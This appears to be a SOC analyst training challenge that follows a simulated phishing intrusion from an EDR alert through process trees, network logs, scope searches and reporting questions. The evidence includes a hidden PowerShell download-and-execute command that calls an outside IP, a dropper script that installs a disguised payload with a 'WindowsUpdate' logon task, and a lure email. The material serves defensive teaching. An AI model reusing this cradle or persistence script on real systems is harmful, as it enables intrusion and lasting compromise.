A SOC alert is just the starting point. Real investigations unfold in layers - each thing you check reveals something new, and you have to connect the pieces as you go. This challenge follows a single incident from initial alert through full investigation. You'll see the same data a SOC analyst would see at each stage: EDR alerts, process trees, scripts, network logs, and more. Your job is to follow the trail, interpret what you're finding, and arrive at a complete picture of what happened.
Following the Trail
Work through the scenario and submit your answers.
The Initial Alert
Monday morning, 9:47 AM. This hits your queue:
SIEM Alert: Suspicious Process Chain Detected
Severity: High
Host: WKS-FIN-PC031
User: rachel.nguyen (Finance - Accounts Payable)
Alert Source: Microsoft Defender for Endpoint
Process: cmd.exe
Parent: OUTLOOK.EXE
Grandparent: explorer.exe
Command Line: cmd.exe /c whoami && hostname && ipconfig /all
Timestamp: 2025-12-16 09:47:23 UTC
What about this alert should catch your attention? Focus on what the process chain and command tell you about what might be happening.
Before digging deeper, you want to pull additional context. Select all data sources you would query at this stage.
The Process Tree
You pull the full process tree from Defender for Endpoint:
explorer.exe (PID: 1204)
└── OUTLOOK.EXE (PID: 3892)
└── cmd.exe (PID: 7241) - "cmd.exe /c whoami && hostname && ipconfig /all"
└── whoami.exe (PID: 7244)
└── hostname.exe (PID: 7248)
└── ipconfig.exe (PID: 7252)
└── cmd.exe (PID: 7456) - "cmd.exe /c net user /domain"
└── net.exe (PID: 7460)
└── powershell.exe (PID: 7512) - [command truncated in UI, see raw logs]
Analyze this process tree. What story does it tell about what's happening on this machine? What's the significance of multiple child processes spawning from Outlook, and what do these specific commands suggest about the attacker's objectives at this stage?
The PowerShell Payload
You pull the full command line for the PowerShell process (PID 7512):
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://45.133.172.89/update.ps1'); Invoke-Update -Path 'C:\Users\rachel.nguyen\AppData\Local\Temp'"
You also manage to retrieve the contents of update.ps1 before the server went offline:
function Invoke-Update {
param([string]$Path)
$dest = "$Path\svchost.exe"
$url = "http://45.133.172.89/bin/payload.exe"
(New-Object Net.WebClient).DownloadFile($url, $dest)
$trigger = New-ScheduledTaskTrigger -AtLogon
$action = New-ScheduledTaskAction -Execute $dest
Register-ScheduledTask -TaskName "WindowsUpdate" -Trigger $trigger -Action $action -RunLevel Highest -Force
Start-Process -FilePath $dest -WindowStyle Hidden
}
Break down what this script does, step by step. What techniques is the attacker using, and why would they choose these methods? What does this tell you about their goals beyond initial access?
The script creates a scheduled task named "WindowsUpdate" that runs at logon. Why is this name significant from an attacker's perspective, and how would you locate this task on the affected system to confirm it exists?
Network Activity
You pull firewall and proxy logs for WKS-FIN-PC031 from 09:45 to 10:15 UTC:
Timestamp (UTC) Dest IP Port Domain Bytes Category
09:47:18 45.133.172.89 80 - 12,445 Uncategorized
09:47:24 45.133.172.89 80 - 847,221 Uncategorized
09:48:01 45.133.172.89 80 - 1,204 Uncategorized
09:52:33 185.56.89.12 443 paste.ee 2,847 File Sharing
09:53:17 185.56.89.12 443 paste.ee 156,442 File Sharing
09:58:44 91.203.45.67 443 - 1,024 Uncategorized
09:59:01 91.203.45.67 443 - 1,024 Uncategorized
09:59:18 91.203.45.67 443 - 1,024 Uncategorized
[Pattern continues every 15-20 seconds]
Interpret these network logs in the context of what you've already found. Map the connections to the stages of the attack where possible. What does the traffic to paste.ee likely represent? What about the repeating pattern to 91.203.45.67?
Scope Assessment
You search across the environment for related indicators. Your queries return:
IOC Search Results - 45.133.172.89
Host User First Seen (UTC) Process
WKS-FIN-PC031 rachel.nguyen 2025-12-16 09:47:18 powershell.exe
WKS-FIN-PC018 marcus.webb 2025-12-16 09:52:07 powershell.exe
WKS-HR-PC007 jennifer.okafor 2025-12-16 10:01:33 powershell.exe
IOC Search Results - Scheduled Task "WindowsUpdate" (non-Microsoft)
Host User Created (UTC)
WKS-FIN-PC031 rachel.nguyen 2025-12-16 09:47:41
WKS-FIN-PC018 marcus.webb 2025-12-16 09:52:22
Based on these results, what's the current known scope of this incident? Note anything significant about the affected users or timing.
Given the scope has expanded beyond one machine, select all actions that should happen now.
Initial Access
You pull Rachel's recent emails and find this, received at 09:44 UTC:
From: "IT Support" <it.support@companysupport-portal.com>
To: rachel.nguyen@company.com
Subject: [Urgent] Payroll System Update Required
Hi Rachel,
We're updating the payroll processing system before end of year.
As an Accounts Payable team member, you need to verify your access still works.
Please open the attached document and follow the instructions to confirm your credentials.
This must be completed by end of day to ensure your December processing isn't interrupted.
Thanks,
IT Support Team
Attachment: Payroll_Verification_Form.docm (macro-enabled Word document)
You now have the full picture from initial access to current state. Write a timeline summarizing this incident: how the attacker got in, what they did once inside, what persistence they established, and what command and control infrastructure they set up. Reference specific timestamps and IOCs where relevant.
Response and Reporting
You need to brief your manager and draft the initial incident report.
Based on everything you've found:
- What immediate containment and remediation steps should be taken?
- What gaps allowed this to happen (technical and human)?
- What recommendations would you make to prevent similar incidents?
- What questions remain unanswered that would require further investigation?
This challenge has closed, so no points are awarded. You can still work through it and keep your response.